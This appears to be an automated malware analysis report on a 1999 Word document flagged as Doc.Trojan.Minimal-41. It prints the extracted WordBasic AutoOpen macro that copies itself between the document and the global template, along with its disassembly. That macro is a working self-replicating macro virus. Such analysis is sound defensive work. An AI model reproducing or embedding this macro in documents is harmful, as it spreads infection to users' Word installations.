Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d11d6b8eb0dcdde…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 1999-05-09 18:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 68bbc784e031e49b8549049515bf41e7
SHA-1: 9f0151a1af345ada0cb02c99e4bd34a049822619
SHA-256: 0d11d6b8eb0dcdde0a2581d8a6e5e66b5a2b7b994cb7ab4dffdbd9b52cdc63ad
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic AutoOpen macro. The macro's primary function appears to be copying itself using the MacroCopy function, which could be an attempt to ensure execution or establish persistence. No other malicious functionality was directly observed in the provided evidence.

Heuristics (4)

  • [critical] ClamAV: Doc.Trojan.Minimal-41 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Minimal-41
  • [medium] VBA macros detected, 1 related finding (OLE_VBA_MACROS)
    Document contains VBA macro code
  • [high] AutoOpen macro (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • [medium] Legacy WordBasic auto-exec macro marker (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1308 bytes
SHA-256: 18a10057f0a7ee96ead684db5fc91dc3a8befcf634c46686f428427d65f18e5a
Detection: ClamAV: Doc.Trojan.Minimal-41
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim a$
Dim b$
Dim c$
c$ = WordBasic.[FileName$]()
On Error Resume Next: a$ = c$ + ":AutoopeN"
b$ = "Global:aUTOOPEn": WordBasic.MacroCopy a$, b$
WordBasic.MacroCopy b$, a$
End Sub

' Processing file: /opt/analyzer/scan_staging/acf5dc72de5344d5b88a32b7902321a5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 1242 bytes
' Line #0:
' 	FuncDefn (Public Sub MAIN())
' Line #1:
' 	Dim 
' 	VarDefn a
' Line #2:
' 	Dim 
' 	VarDefn B
' Line #3:
' 	Dim 
' 	VarDefn c
' Line #4:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St c$ 
' Line #5:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	Ld c$ 
' 	LitStr 0x0009 ":AutoopeN"
' 	Add 
' 	St a$ 
' Line #6:
' 	LitStr 0x000F "Global:aUTOOPEn"
' 	St B$ 
' 	BoS 0x0000 
' 	Ld a$ 
' 	Ld B$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #7:
' 	Ld B$ 
' 	Ld a$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #8:
' 	EndSub